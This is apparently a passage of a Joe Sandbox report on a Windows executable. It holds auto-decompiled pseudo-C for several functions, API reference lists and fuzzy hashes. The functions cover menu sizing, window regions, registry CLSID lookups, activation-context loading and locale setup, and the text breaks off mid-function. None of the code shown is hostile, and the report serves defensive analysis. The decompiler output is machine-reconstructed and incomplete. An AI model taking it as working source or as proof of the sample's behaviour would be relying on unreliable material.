                  Similarity
                  • API ID: Rect$Create$Object$CopyInflateIntersectSelect$BitmapBrushCombineDeleteH_prolog3IndirectPattern
                  • String ID: L+E
                  • API String ID: 714730959-4127712704
                  • Opcode ID: 6aa0efc2d5fbc0ece01efad2b7094022daf9b6fd7deab85dd961b32c0ce17b0a
                  • Instruction ID: c7474286af9328ab8c9880faf502c19b26b7c4664d15d937edb6bbe153de222e
                  • Opcode Fuzzy Hash: 6aa0efc2d5fbc0ece01efad2b7094022daf9b6fd7deab85dd961b32c0ce17b0a
                  • Instruction Fuzzy Hash: 1191F871A0011AEFCF01DFA5D9859EEBBB9FF08309F50416AF505A2251DB38AE05CB69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0041F611, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 113windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 94%
                  			E0041F611(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t50;
				int _t62;
				intOrPtr _t65;
				int _t68;
				void* _t73;
				struct tagMENUITEMINFOA _t84;
				void* _t103;
				intOrPtr _t105;
				intOrPtr _t110;
				void* _t112;

				_t103 = __edx;
				_push(0x54);
				E00431A9B(E0044BDC2, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t112 - 0x10)) = __ecx;
				_t105 =  *((intOrPtr*)(_t112 + 8));
				_t50 =  *((intOrPtr*)(_t105 + 0x14));
				if(_t50 == 0) {
					 *(_t112 - 0x18) = GetSystemMetrics(0x32) + 2;
					_t110 = GetSystemMetrics(0x31) + 2;
					__eflags = _t110;
				} else {
					GetObjectA( *(_t50 + 4), 0x18, _t112 - 0x30);
					 *(_t112 - 0x18) =  *((intOrPtr*)(_t112 - 0x28)) + 2;
					_t110 =  *((intOrPtr*)(_t112 - 0x2c)) + 2;
				}
				E004014C0(_t112 + 8, _t103);
				 *(_t112 - 4) =  *(_t112 - 4) & 0x00000000;
				_t84 = 0x30;
				E00431160(_t105, _t112 - 0x60, 0, _t84);
				 *(_t112 - 0x60) = _t84;
				 *((intOrPtr*)(_t112 - 0x5c)) = 0x40;
				if(GetMenuItemInfoA( *( *((intOrPtr*)(_t112 - 0x10)) + 4),  *(_t105 + 8), 0, _t112 - 0x60) != 0) {
					_t65 = E004014F0(_t112 + 8,  *((intOrPtr*)(_t112 - 0x38)));
					 *((intOrPtr*)(_t112 - 0x38)) =  *((intOrPtr*)(_t112 - 0x38)) + 1;
					 *((intOrPtr*)(_t112 - 0x3c)) = _t65;
					_t68 = GetMenuItemInfoA( *( *((intOrPtr*)(_t112 - 0x10)) + 4),  *(_t105 + 8), 0, _t112 - 0x60);
					_t87 = _t68;
					E0040A356(_t112 + 8, 0xffffffff);
					_t118 = _t68;
					if(_t68 != 0) {
						_push(0);
						E00422EAE(_t87, _t112 - 0x2c, _t105, _t110, _t118);
						 *(_t112 - 4) = 1;
						_t73 = E00423194(_t112 - 0x2c,  *((intOrPtr*)(_t112 - 0x10)) + 8);
						E0040BD78(_t112 - 0x2c, _t112 - 0x14, _t112 + 8);
						E00423194(_t112 - 0x2c, _t73);
						_t110 = _t110 +  *((intOrPtr*)(_t112 - 0x14)) + 3;
						 *(_t112 - 4) = 0;
						E00422F02(_t73, _t112 - 0x2c, _t105, _t110,  *((intOrPtr*)(_t112 - 0x10)) + 8);
					}
				}
				if(GetSystemMetrics(0xf) <=  *(_t112 - 0x18)) {
					_t62 =  *(_t112 - 0x18);
				} else {
					_t62 = GetSystemMetrics(0xf);
				}
				 *(_t105 + 0x10) = _t62;
				 *((intOrPtr*)(_t105 + 0xc)) = _t110;
				return E00431B73(E004010B0( *((intOrPtr*)(_t112 + 8)) + 0xfffffff0, _t103));
			}













                  0x0041f611
                  0x0041f611
                  0x0041f618
                  0x0041f61d
                  0x0041f620
                  0x0041f623
                  0x0041f628
                  0x0041f658
                  0x0041f660
                  0x0041f660
                  0x0041f62a
                  0x0041f633
                  0x0041f642
                  0x0041f645
                  0x0041f645
                  0x0041f664
                  0x0041f669
                  0x0041f66f
                  0x0041f677
                  0x0041f68f
                  0x0041f698
                  0x0041f6a3
                  0x0041f6ab
                  0x0041f6b0
                  0x0041f6b7
                  0x0041f6c6
                  0x0041f6cd
                  0x0041f6cf
                  0x0041f6d4
                  0x0041f6d6
                  0x0041f6d8
                  0x0041f6dd
                  0x0041f6ec
                  0x0041f6f0
                  0x0041f702
                  0x0041f70b
                  0x0041f716
                  0x0041f71a
                  0x0041f71e
                  0x0041f71e
                  0x0041f6d6
                  0x0041f730
                  0x0041f738
                  0x0041f732
                  0x0041f734
                  0x0041f734
                  0x0041f741
                  0x0041f744
                  0x0041f751

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MetricsSystem$InfoItemMenu$H_prolog3Object_memset
                  • String ID: @
                  • API String ID: 3341327673-2766056989
                  • Opcode ID: 41161956b9a01d5f9c9dd8a14ab3da4081575cdaa8d29da6693ed210bcd308bc
                  • Instruction ID: e77ca942a99a59ecf314c7d34bbccfe8690614ce3f94bd7383c0d0d0d390d164
                  • Opcode Fuzzy Hash: 41161956b9a01d5f9c9dd8a14ab3da4081575cdaa8d29da6693ed210bcd308bc
                  • Instruction Fuzzy Hash: 97415371900219AFDB00DFA5CC82FEDB7B4FF18314F04412AFA15A7291DB74AA45CBA9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0041A027, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 94timeCOMMON
                  Download Yara Rule
                  C-Code - Quality: 95%
                  			E0041A027(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				int _t35;
				int _t36;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t74;
				void* _t75;

				_push(0xc);
				E00431A9B(E0044B74A, __ebx, __edi, __esi);
				_t74 = __ecx;
				_t61 =  *((intOrPtr*)(_t75 + 8));
				_t77 =  *((intOrPtr*)(_t75 + 8));
				if( *((intOrPtr*)(_t75 + 8)) == 0) {
					E00406436(__ebx, _t61, __edi, __ecx, _t77);
				}
				_t56 = _t74 + 0x64;
				E00419355(_t61, _t56);
				 *((intOrPtr*)(_t74 + 0x58)) =  *((intOrPtr*)(_t74 + 0x68)) - GetSystemMetrics(0x25);
				 *((intOrPtr*)(_t74 + 0x60)) = GetSystemMetrics(0x25) +  *((intOrPtr*)(_t74 + 0x68));
				_t35 = GetSystemMetrics(0x24);
				_t57 =  *_t56;
				 *((intOrPtr*)(_t74 + 0x54)) =  *_t56 - _t35;
				_t36 = GetSystemMetrics(0x24);
				 *((intOrPtr*)(_t74 + 0x5c)) = _t36 + _t57;
				 *((intOrPtr*)(_t75 - 0x10)) =  *_t74;
				 *((intOrPtr*)(_t75 - 0x10)) =  *((intOrPtr*)( *((intOrPtr*)(_t75 - 0x10)) + 0x5c))(0x88, E00411D22( *_t56 - _t35, _t77, 0x800, 0, 0, 0), 0, 0x80000000, _t57 + 0xfffffff0,  *((intOrPtr*)(_t74 + 0x68)) - 0x10, 0x20, 0x20, 0, 0, 0);
				E00406A7F(_t74,  *((intOrPtr*)(_t75 + 8)));
				if( *((intOrPtr*)(_t75 - 0x10)) != 0) {
					 *(_t75 - 0x14) = 0;
					 *((intOrPtr*)(_t75 - 0x18)) = 0x452b4c;
					 *(_t75 - 4) = 0;
					E00423059(0x452b4c, _t75 - 0x18, 0, CreateEllipticRgn(0, 0, 0x20, 0x20));
					SetWindowRgn( *(_t74 + 0x20),  *(_t75 - 0x14), 1);
					E0040EE3C(0x452b4c, _t75 - 0x18, SetCapture( *(_t74 + 0x20)));
					SetTimer( *(_t74 + 0x20), 0xe000, 0x32, 0);
					 *(_t75 - 4) =  *(_t75 - 4) | 0xffffffff;
					 *((intOrPtr*)(_t75 - 0x18)) = 0x452b4c;
					E0040ADD4(0x452b4c, _t75 - 0x18, 0, _t74,  *(_t75 - 4));
				}
				return E00431B73( *((intOrPtr*)(_t75 - 0x10)));
			}









                  0x0041a027
                  0x0041a02e
                  0x0041a033
                  0x0041a035
                  0x0041a038
                  0x0041a03a
                  0x0041a03c
                  0x0041a03c
                  0x0041a041
                  0x0041a045
                  0x0041a05b
                  0x0041a065
                  0x0041a068
                  0x0041a06c
                  0x0041a072
                  0x0041a075
                  0x0041a080
                  0x0041a087
                  0x0041a0bb
                  0x0041a0be
                  0x0041a0c6
                  0x0041a0cd
                  0x0041a0d0
                  0x0041a0d9
                  0x0041a0e6
                  0x0041a0f3
                  0x0041a103
                  0x0041a113
                  0x0041a119
                  0x0041a120
                  0x0041a123
                  0x0041a123
                  0x0041a130

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0041A02E
                  • GetSystemMetrics.USER32 ref: 0041A052
                  • GetSystemMetrics.USER32 ref: 0041A05E
                  • GetSystemMetrics.USER32 ref: 0041A068
                  • GetSystemMetrics.USER32 ref: 0041A075
                  • CreateEllipticRgn.GDI32(00000000,00000000,00000020,00000020), ref: 0041A0DC
                  • SetWindowRgn.USER32(?,?,00000001), ref: 0041A0F3
                  • SetCapture.USER32(?), ref: 0041A0FC
                  • SetTimer.USER32(?,0000E000,00000032,00000000), ref: 0041A113
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MetricsSystem$H_prolog3$CaptureCreateEllipticException@8ThrowTimerWindow
                  • String ID: L+E
                  • API String ID: 3309283864-4127712704
                  • Opcode ID: 1575d33e1ff024e78d8027ad71dd57e5d72c5d3502752463ac89e66c02c900ad
                  • Instruction ID: a2aa5e01c565e6b9afcf6d6bee22cb5d65a4782031c2c85be5729872fcbbbe56
                  • Opcode Fuzzy Hash: 1575d33e1ff024e78d8027ad71dd57e5d72c5d3502752463ac89e66c02c900ad
                  • Instruction Fuzzy Hash: 77311071640745AFDB20AFA6CC4AF6FBBB4FF85704F00091EB241A62E1CB74A940CB58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00428ECF, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 69registryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 93%
                  			E00428ECF(void* __ebx, void* _a4, intOrPtr _a8) {
				void* _v8;
				void* _v12;
				int _v16;
				char* _v20;
				int _v24;
				signed int _t35;
				int* _t44;

				_t44 = 0;
				_v12 = 0;
				_v20 = E004014F0(_a8, 0x104);
				_v16 = 0x104;
				_v24 = 0;
				if(RegOpenKeyA(0x80000000, ?str?,  &_v12) == 0) {
					_v8 = 0;
					if(RegOpenKeyA(_v12, _a4,  &_v8) == 0) {
						_a4 = 0;
						if(RegOpenKeyA(_v8, "InProcServer32",  &_a4) == 0) {
							_t35 = RegQueryValueExA(_a4, 0x44f0f5, 0,  &_v24, _v20,  &_v16);
							asm("sbb esi, esi");
							_t44 =  ~_t35 + 1;
							RegCloseKey(_a4);
						}
						RegCloseKey(_v8);
					}
					RegCloseKey(_v12);
				}
				E0040A356(_a8, 0xffffffff);
				return _t44;
			}










                  0x00428ee1
                  0x00428ee4
                  0x00428eec
                  0x00428ef8
                  0x00428f06
                  0x00428f0d
                  0x00428f17
                  0x00428f27
                  0x00428f35
                  0x00428f3c
                  0x00428f52
                  0x00428f5f
                  0x00428f61
                  0x00428f62
                  0x00428f62
                  0x00428f67
                  0x00428f67
                  0x00428f6c
                  0x00428f6e
                  0x00428f74
                  0x00428f7e

                  APIs
                  • RegOpenKeyA.ADVAPI32(80000000,CLSID,004542E8), ref: 00428F09
                  • RegOpenKeyA.ADVAPI32(00000000,00000000,00000000), ref: 00428F1D
                  • RegOpenKeyA.ADVAPI32(00000000,InProcServer32,?), ref: 00428F38
                  • RegQueryValueExA.ADVAPI32(?,0044F0F5,00000000,?,?,?), ref: 00428F52
                  • RegCloseKey.ADVAPI32(?), ref: 00428F62
                  • RegCloseKey.ADVAPI32(00000000), ref: 00428F67
                  • RegCloseKey.ADVAPI32(?), ref: 00428F6C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CloseOpen$QueryValue
                  • String ID: CLSID$InProcServer32$BE
                  • API String ID: 3523390698-3134485842
                  • Opcode ID: bdafd1ae98bdaf0f2cb46c77699de44374e36c91a30ffc45151d91ef1fc49913
                  • Instruction ID: f24009deadb1cf4b51eab228b599f0d3e410838491bd349ca97d2e46ea76daff
                  • Opcode Fuzzy Hash: bdafd1ae98bdaf0f2cb46c77699de44374e36c91a30ffc45151d91ef1fc49913
                  • Instruction Fuzzy Hash: 23119D72900128BFDF10AFA5CC40DEEBB79EF44750B104126F914A7260D7749F45CBA8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00414A58, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 60libraryloaderCOMMON
                  Download Yara Rule
                  C-Code - Quality: 88%
                  			E00414A58(intOrPtr __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t5;
				_Unknown_base(*)()* _t10;
				struct HINSTANCE__* _t18;
				void* _t19;
				char _t21;
				intOrPtr _t23;
				_Unknown_base(*)()* _t24;
				_Unknown_base(*)()* _t25;

				_push(__ecx);
				_t5 = __ecx;
				_t16 = _a4;
				 *((intOrPtr*)(__ecx)) = _a4;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				_v8 = __ecx;
				_t21 =  *0x4664dc; // 0x0
				if(_t21 == 0) {
					_push(_t19);
					_t18 = GetModuleHandleA("KERNEL32");
					_t22 = _t18;
					if(_t18 == 0) {
						L2:
						E00406436(0, _t16, _t18, _t19, _t22);
					}
					 *0x4664cc = GetProcAddress(_t18, "CreateActCtxA");
					 *0x4664d0 = GetProcAddress(_t18, "ReleaseActCtx");
					 *0x4664d4 = GetProcAddress(_t18, "ActivateActCtx");
					_t10 = GetProcAddress(_t18, "DeactivateActCtx");
					_pop(_t18);
					 *0x4664d8 = _t10;
					_pop(_t19);
					_t23 =  *0x4664cc; // 0x0
					if(_t23 == 0) {
						__eflags =  *0x4664d0; // 0x0
						if(__eflags != 0) {
							goto L2;
						} else {
							__eflags =  *0x4664d4; // 0x0
							if(__eflags != 0) {
								goto L2;
							} else {
								__eflags = _t10;
								if(__eflags != 0) {
									goto L2;
								}
							}
						}
					} else {
						_t24 =  *0x4664d0; // 0x0
						if(_t24 == 0) {
							goto L2;
						} else {
							_t25 =  *0x4664d4; // 0x0
							if(_t25 == 0) {
								goto L2;
							} else {
								_t22 = _t10;
								if(_t10 == 0) {
									goto L2;
								}
							}
						}
					}
					_t5 = _v8;
					 *0x4664dc = 1;
				}
				return _t5;
			}
















                  0x00414a5d
                  0x00414a5e
                  0x00414a60
                  0x00414a66
                  0x00414a68
                  0x00414a6b
                  0x00414a6e
                  0x00414a74
                  0x00414a7a
                  0x00414a87
                  0x00414a89
                  0x00414a8b
                  0x00414a8d
                  0x00414a8d
                  0x00414a8d
                  0x00414aa6
                  0x00414ab3
                  0x00414ac0
                  0x00414ac5
                  0x00414ac7
                  0x00414ac8
                  0x00414acd
                  0x00414ace
                  0x00414ad4
                  0x00414aec
                  0x00414af2
                  0x00000000
                  0x00414af4
                  0x00414af4
                  0x00414afa
                  0x00000000
                  0x00414afc
                  0x00414afc
                  0x00414afe
                  0x00000000
                  0x00000000
                  0x00414afe
                  0x00414afa
                  0x00414ad6
                  0x00414ad6
                  0x00414adc
                  0x00000000
                  0x00414ade
                  0x00414ade
                  0x00414ae4
                  0x00000000
                  0x00414ae6
                  0x00414ae6
                  0x00414ae8
                  0x00000000
                  0x00414aea
                  0x00414ae8
                  0x00414ae4
                  0x00414adc
                  0x00414b00
                  0x00414b03
                  0x00414b03
                  0x00414b0c

                  APIs
                  • GetModuleHandleA.KERNEL32(KERNEL32), ref: 00414A81
                  • GetProcAddress.KERNEL32(00000000,CreateActCtxA), ref: 00414A9E
                  • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 00414AAB
                  • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 00414AB8
                  • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 00414AC5
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: AddressProc$HandleModule
                  • String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
                  • API String ID: 667068680-3617302793
                  • Opcode ID: 41b6fbd96fd88b6159bd24798665531820fea7318a93b66cdc67d38a1ab704a9
                  • Instruction ID: 4fcf1ef3ac8ca3b18eba1858758f2dadc0745a3739b28e71c64bd8d406f4101a
                  • Opcode Fuzzy Hash: 41b6fbd96fd88b6159bd24798665531820fea7318a93b66cdc67d38a1ab704a9
                  • Instruction Fuzzy Hash: 6911A771D80211BBCB20DFA6AC849577EACFA95B56312443FE50483221EAB84885CF5E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00448C0F, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 49COMMON
                  Download Yara Rule
                  C-Code - Quality: 86%
                  			E00448C0F(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t18;
				void* _t23;
				void* _t39;
				intOrPtr _t43;
				void* _t44;

				_t39 = __edx;
				_t29 = __ebx;
				_push(0x14);
				E00431A9B(E0044CC9D, __ebx, __edi, __esi);
				E00448F7B(_t44 - 0x14, 0);
				_t43 =  *0x467440; // 0x0
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
				_t18 = E00447826( *((intOrPtr*)(_t44 + 8)), E00447732(0x4674d8));
				_t41 = _t18;
				if(_t18 == 0) {
					if(_t43 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_push(_t44 - 0x10);
						_t23 = E00448A8D(__ebx, _t41, _t43, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E00430C66(_t44 - 0x20, "bad cast");
							E00430CF4(_t44 - 0x20, 0x45e790);
						}
						_t41 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x467440 =  *((intOrPtr*)(_t44 - 0x10));
						E00447769( *((intOrPtr*)(_t44 - 0x10)));
						E0044911C(_t29, _t39, _t41, _t43, _t41);
					} else {
						_t41 = _t43;
					}
				}
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E00448FA3(_t44 - 0x14);
				return E00431B73(_t41);
			}








                  0x00448c0f
                  0x00448c0f
                  0x00448c0f
                  0x00448c16
                  0x00448c20
                  0x00448c25
                  0x00448c2b
                  0x00448c34
                  0x00448c40
                  0x00448c45
                  0x00448c49
                  0x00448c4d
                  0x00448c53
                  0x00448c59
                  0x00448c5a
                  0x00448c61
                  0x00448c64
                  0x00448c6e
                  0x00448c7c
                  0x00448c7c
                  0x00448c81
                  0x00448c86
                  0x00448c8c
                  0x00448c92
                  0x00448c4f
                  0x00448c4f
                  0x00448c4f
                  0x00448c4d
                  0x00448c98
                  0x00448c9f
                  0x00448cab

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00448C16
                  • std::_Lockit::_Lockit.LIBCPMT ref: 00448C20
                  • int.LIBCPMT ref: 00448C37
                    • Part of subcall function 00447732: std::_Lockit::_Lockit.LIBCPMT ref: 00447745
                  • std::locale::_Getfacet.LIBCPMT ref: 00448C40
                  • codecvt.LIBCPMT ref: 00448C5A
                  • std::bad_exception::bad_exception.LIBCMT ref: 00448C6E
                  • __CxxThrowException@8.LIBCMT ref: 00448C7C
                  • std::locale::facet::_Incref.LIBCPMT ref: 00448C8C
                  • std::locale::facet::facet_Register.LIBCPMT ref: 00448C92
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: LockitLockit::_std::_$Exception@8GetfacetH_prolog3IncrefRegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::_std::locale::facet::_std::locale::facet::facet_
                  • String ID: bad cast
                  • API String ID: 577375395-3145022300
                  • Opcode ID: 08916e8601030b88c8772c978c6339b6b33d72f4ec2f0943d0d0d6baf5f80f4f
                  • Instruction ID: b9ca8288bc3497393f69db73b50c762de20d67692500da4ed427a5f0706e090c
                  • Opcode Fuzzy Hash: 08916e8601030b88c8772c978c6339b6b33d72f4ec2f0943d0d0d6baf5f80f4f
                  • Instruction Fuzzy Hash: 4701C43194521997EF05FB61C882ABE7235AF44329F54021FF1106B2E1DF7C9A059BAD
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0041EA0E, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 28libraryloaderCOMMON
                  Download Yara Rule
                  C-Code - Quality: 91%
                  			E0041EA0E(void* __esi) {
				void* _t1;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t6;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t10;

				_t10 = __esi;
				if( *0x466500 == 0) {
					_t2 = GetModuleHandleA("KERNEL32");
					 *0x466500 = _t2;
					_t14 = _t2;
					if(_t2 == 0) {
						_t2 = E00406436(_t7, _t8, _t9, __esi, _t14);
					}
					_push(_t10);
					 *0x4664ec = GetProcAddress(_t2, "CreateActCtxW");
					 *0x4664f0 = GetProcAddress( *0x466500, "ReleaseActCtx");
					 *0x4664f4 = GetProcAddress( *0x466500, "ActivateActCtx");
					_t6 = GetProcAddress( *0x466500, "DeactivateActCtx");
					 *0x4664f8 = _t6;
					return _t6;
				}
				return _t1;
			}










                  0x0041ea0e
                  0x0041ea15
                  0x0041ea1c
                  0x0041ea22
                  0x0041ea27
                  0x0041ea29
                  0x0041ea2b
                  0x0041ea2b
                  0x0041ea30
                  0x0041ea4a
                  0x0041ea5c
                  0x0041ea6e
                  0x0041ea73
                  0x0041ea75
                  0x00000000
                  0x0041ea7a
                  0x0041ea7b

                  APIs
                  • GetModuleHandleA.KERNEL32(KERNEL32,0041EB28), ref: 0041EA1C
                  • GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 0041EA3D
                  • GetProcAddress.KERNEL32(ReleaseActCtx), ref: 0041EA4F
                  • GetProcAddress.KERNEL32(ActivateActCtx), ref: 0041EA61
                  • GetProcAddress.KERNEL32(DeactivateActCtx), ref: 0041EA73
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: AddressProc$Exception@8H_prolog3HandleModuleThrow
                  • String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
                  • API String ID: 417325364-2424895508
                  • Opcode ID: a55b86447eb033fc2c2ed33bbb383f0b3294b9c3705bd7f49da141e42ade0cd5
                  • Instruction ID: 797181131107fc9c9d18895cd176618ea7f7a223a3ca38473e3e5917ec363889
                  • Opcode Fuzzy Hash: a55b86447eb033fc2c2ed33bbb383f0b3294b9c3705bd7f49da141e42ade0cd5
                  • Instruction Fuzzy Hash: E6F0F878D40311BADB11AF72BC0AA463EA4FB48756712443BEC1192276FBF994448E8E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00417C2D, Relevance: 16.6, APIs: 11, Instructions: 139COMMON
                  Download Yara Rule
                  C-Code - Quality: 94%
                  			E00417C2D(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t54;
				void* _t58;
				signed int _t59;
				signed int _t63;
				signed int _t71;
				signed int _t84;
				void* _t94;
				struct HINSTANCE__* _t96;
				signed int _t97;
				void* _t98;
				signed int _t100;
				void* _t101;
				void* _t102;

				_t102 = __eflags;
				_t94 = __edx;
				_push(0x24);
				E00431ACE(E0044B5B3, __ebx, __edi, __esi);
				_t100 = __ecx;
				 *((intOrPtr*)(_t101 - 0x20)) = __ecx;
				 *(_t101 - 0x1c) =  *(__ecx + 0x60);
				 *(_t101 - 0x18) =  *(__ecx + 0x5c);
				_t54 = E0041F363(__ebx, __edi, __ecx, _t102);
				_t96 =  *(_t54 + 0xc);
				_t84 = 0;
				_t103 =  *(_t100 + 0x58);
				if( *(_t100 + 0x58) != 0) {
					_t96 =  *(E0041F363(0, _t96, _t100, _t103) + 0xc);
					_t54 = LoadResource(_t96, FindResourceA(_t96,  *(_t100 + 0x58), 5));
					 *(_t101 - 0x18) = _t54;
				}
				if( *(_t101 - 0x18) != _t84) {
					_t54 = LockResource( *(_t101 - 0x18));
					 *(_t101 - 0x1c) = _t54;
				}
				if( *(_t101 - 0x1c) != _t84) {
					_t86 = _t100;
					 *(_t101 - 0x14) = E004177A7(_t84, _t100, __eflags);
					E0040EEF5(__eflags);
					 *(_t101 - 0x28) =  *(_t101 - 0x28) & _t84;
					 *(_t101 - 0x2c) = _t84;
					 *(_t101 - 0x24) = _t84;
					__eflags =  *(_t101 - 0x14) - _t84;
					if(__eflags != 0) {
						__eflags =  *(_t101 - 0x14) - GetDesktopWindow();
						if(__eflags != 0) {
							__eflags = IsWindowEnabled( *(_t101 - 0x14));
							if(__eflags != 0) {
								EnableWindow( *(_t101 - 0x14), 0);
								 *(_t101 - 0x2c) = 1;
								_t84 = E00403AA0();
								 *(_t101 - 0x24) = _t84;
								__eflags = _t84;
								if(__eflags != 0) {
									_t86 = _t84;
									__eflags =  *((intOrPtr*)( *_t84 + 0x128))();
									if(__eflags != 0) {
										_t86 = _t84;
										__eflags = E00412C5B(_t84);
										if(__eflags != 0) {
											_t86 = _t84;
											E00412C76(_t84, 0);
											 *(_t101 - 0x28) = 1;
										}
									}
								}
							}
						}
					}
					 *(_t101 - 4) =  *(_t101 - 4) & 0x00000000;
					E00410F0D(__eflags, _t100);
					_t58 = E0040EE3C(_t84, _t86,  *(_t101 - 0x14));
					_push(_t96);
					_push(_t58);
					_push( *(_t101 - 0x1c));
					_t59 = E00417A77(_t84, _t100, _t94, _t96, _t100, __eflags);
					_t97 = 0;
					__eflags = _t59;
					if(_t59 != 0) {
						__eflags =  *(_t100 + 0x3c) & 0x00000010;
						if(( *(_t100 + 0x3c) & 0x00000010) != 0) {
							_t98 = 4;
							_t71 = E00412B38(_t100);
							__eflags = _t71 & 0x00000100;
							if((_t71 & 0x00000100) != 0) {
								_t98 = 5;
							}
							E0040E9F9(_t100, _t98);
							_t97 = 0;
							__eflags = 0;
						}
